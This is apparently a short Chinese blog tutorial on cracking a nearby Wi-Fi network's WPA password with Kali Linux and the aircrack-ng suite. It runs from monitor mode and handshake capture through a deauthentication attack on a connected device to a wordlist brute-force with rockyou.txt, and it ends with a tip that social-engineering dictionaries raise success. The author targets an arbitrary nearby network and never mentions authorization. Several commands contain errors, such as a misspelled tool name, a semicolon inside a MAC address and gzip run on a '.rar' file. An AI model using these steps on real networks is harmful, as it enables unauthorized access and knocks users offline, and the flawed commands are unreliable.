好記性不如爛筆頭,記錄一下。
我是在淘寶買的拓實N87,Kali可以識別,還行。
操作系統:Kali
開始吧。
查看一下網卡的接口。命令如下
1 airmon-ng
可以看出接口名稱是wlan0mon。
接下來開啟無線網卡的監聽模式,命令如下
1 airmon-ng start wlan0mon #接口名稱是什么這里就寫什么
already enabled for 這是因為我已經開啟了,背景可看出。
查看周圍的wifi網絡,命令如下
1 airodump-ng wlan0mon
列出來之后就按Ctrl+C停止。
抓取握手包,抓取握手包是為了暴力破解,這樣子。
airodum-ng -c 13 --bssid 78:EB:14:B2:6A:50 -w ~/ wlan0mon #-c 表示指定wifi的CH的信道數值 #--bssid 就是BSSID # ~/當前文件夾下保存 #選用的接口名稱
這里我選取的如上圖中的是第一個wifi,執行之后結果如下圖。
上圖紅線處左邊的BSSID表示的是路由設備,右邊BSSID表示掛載的設備。
這里正在等待設備連接時產生的握手包,我們可以等待新的設備連接或者掉線重連,也可以這樣。
打開一個新的終端。
輸入
1 aireplay-ng -0 2 -a 78:EB;14:B2:6A:50 -c C8:1E:E7:A5:3A:40 wlan0mon 2 #第一個bssid表示的是路由設備,第二個bssid表示的是掛載設備,回車之后就會斷開與路由的連接,多數系統會選擇自動鏈接,這樣就抓到包了
回到之前的終端,發現如下圖所示。
包已經抓到,那么結束掉Ctrl+C,開始暴力破解了。
1 aircrack-ng -a2 -b 78:EB;14:B2:6A:50 -w /usr/share/wordlists/rockyou.txt ~/*.cap
這個rockyou.txt是Kali自帶的字典,如果你沒有解壓需要解壓。
命令
1 gzip -d /usr/share/wordlists/rockyou.txt.rar
執行如下圖
暴力破解看運氣,要是有社工字典准確率就更高了。